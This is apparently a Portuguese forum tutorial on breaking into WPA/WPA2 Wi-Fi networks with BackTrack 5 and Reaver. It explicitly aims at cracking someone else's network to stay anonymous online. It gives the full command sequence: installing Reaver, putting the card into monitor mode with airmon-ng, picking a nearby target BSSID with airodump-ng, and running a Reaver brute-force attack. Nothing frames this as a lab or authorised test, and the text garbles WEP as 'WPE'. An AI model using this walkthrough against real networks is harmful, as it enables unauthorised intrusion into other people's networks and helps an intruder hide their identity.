Como quebrar WPA/WPA2
Sobre este TuT
Ser COMPLETAMENTE anônimo na web é definitivamente necessário. Para garantir segurança extra, vamos quebrar uma rede sem fio. WPE é definitivamente mais fácil do que isso, mas por que mostrar o que é fácil quando posso mostrar o que é difícil?
Introdução - Preparando o BackTrack
Primeiro, obtenha uma cópia do backtrack 5, disponível para download AQUI . Grave a cadela em um DVD.
Em seguida, inicialize o CD. Se você não sabe como inicializar a partir de um CD ao vivo, verifique o Google. Escolha o modo de texto padrão e inicialize. Adicione o prompt de comando, digitando o seguinte abrirá a GUI...
startx
Em seguida, vamos instalar o Reaver.
Vá para Aplicativos -> Internet -> Wicd Network Manager. Selecione SUA rede e conecte-se. Precisamos fazer isso para instalar algumas coisas. O Reaver permanecerá instalado até sua próxima reinicialização.
Clique no ícone do terminal na barra de menu e digite:
apt-get update
Feito isso, digite:
apt-get install reaver
Preparando-se para rachar
Legal, agora você pode se desconectar da sua rede, por favor. Hora de se preparar para quebrar coletando informações.
No terminal, digite:
iwconfig
Encontre o seu adaptador. Provavelmente será chamado de wlan0, mas é possível ter outro nome.
Em seguida, precisamos colocar nossa placa wireless no modo monitor. Para fazer isso, digite (se o nome do seu adaptador não for wlan0, substitua-o pelo nome que corresponda ao seu adaptador sem fio):
airmon-ng start wlan0
Anote o nome da interface do modo monitor, provavelmente mon0.
Em seguida, precisamos do BSSID do roteador que queremos quebrar. O BSSID é o número de identificação do roteador. Para fazer isso, digite (novamente, supondo que você seja wlan0):
airodump-ng wlan0
Se não funcionar, tente:
airodump-ng mon0
Vamos começar a força bruta!
Na coluna ENC, veremos WPA, WPA2 e WPE. Escolha WPA ou WPA2. Copie o BSSID na extremidade esquerda da tela. Escolha um ponto de acesso com sinal bem forte (relativamente perto de você)
Em seguida, digite terminal, substituindo BSSID e MONINT para combinar com o que você tem. (Monint é o nome da interface do seu monitor, o meu era mon0.):
reaver -i MONINT -b BSSID -vv
Deixe então bruteforce a senha. Para pausar o progresso (por que você faria isso?), pressione Control + C.
Aproveite!